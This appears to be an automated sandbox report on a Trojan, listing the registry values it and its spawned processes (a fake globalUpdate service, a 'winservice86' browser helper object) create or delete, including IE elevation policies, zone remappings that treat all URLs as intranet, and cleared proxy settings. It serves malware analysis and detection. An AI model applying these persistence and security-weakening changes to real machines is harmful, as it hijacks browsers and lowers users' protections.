[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 88 C3 36 07 0E DE 7F DC A9 ED DE ED E2 55 71"

[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"

[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

The process GoogleUpdate.exe:3944 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 58 90 39 89 16 B8 29 AA 2D EF 95 C6 6A 4F A8"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:476 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 35 6D 94 29 04 1E 59 A6 E8 CB A9 DB 20 2B EF"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:2032 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 7E 01 12 B8 CD 08 A1 51 AA E0 02 82 43 95 5F"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"pv" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"tttoken"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

The process GoogleUpdate.exe:1936 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"

[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"

[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"

[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 41 F5 11 07 A9 04 E6 CD 98 CB F8 47 74 7A 50"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"

[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

The Trojan deletes the following registry key(s):

[HKCR\AppID\GoogleUpdate.exe]

The process 17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 61 B7 7F B7 9F 4C ED B5 6F F7 42 2C C1 2B 9E"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppPath" = "%Program Files%\winservice86"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611471155}" = ""

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppPath" = "%Program Files%\winservice86"
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppPath" = "%Program Files%\winservice86"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-helper.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-codedownloader.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"Policy" = "3"
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil64.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611471155}" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"AppPath" = "%Program Files%\winservice86"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"

The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 7A 13 E3 74 1B A1 1E 22 F2 42 83 C6 93 A3 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The process 17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 B8 EF 07 45 62 71 F2 C0 1F CD 6C AA F9 EC B5"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The process 17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 90 E6 8B C3 89 B7 8A 48 11 37 9B 49 48 05 7C"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The process winservice86-bg.exe:2952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 62 9B 3A 74 C7 7E 5A D7 9F 50 C9 E5 DA 1B A1"

The process winservice86-codedownloader.exe:2888 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 28 FC A9 F1 AD 20 35 6E 84 27 D8 47 E2 FC 3A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process winservice86-codedownloader.exe:2796 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A B5 DB 82 26 76 08 BF EF 7E DF CF EC 86 B8 AD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2472 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\HELPDIR]
"(Default)" = "%Program Files%\winservice86"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"Version" = "1.0"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]
"(Default)" = ""

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}]
"(Default)" = "ISandBox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "winservice86"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}]
"(Default)" = "ICrossriderBHO"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"Version" = "1.0"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755 Type Library"

